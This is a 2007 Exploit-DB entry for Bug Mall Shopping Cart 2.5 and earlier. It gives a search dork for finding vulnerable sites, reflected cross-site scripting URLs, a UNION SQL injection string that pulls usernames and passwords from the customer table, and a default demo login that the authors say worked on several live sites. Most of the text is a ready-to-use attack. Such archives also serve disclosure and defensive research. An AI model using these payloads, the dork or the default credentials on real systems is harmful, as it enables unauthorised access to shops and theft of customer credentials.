bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting

EDB-ID:

4103

CVE:

2007-3448 2007-3447 2007-3446

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-06-25

Vulnerable App: 
--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)


SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834


SITE: http://www.bug-mall.org


DORK: Powered by Bug Software intext:Your Cart Contains


EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites
and sucsefully logged in.


EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org</body><html>
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>
EXAMPLE 3: Paste following into search box 
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*


Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-25]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services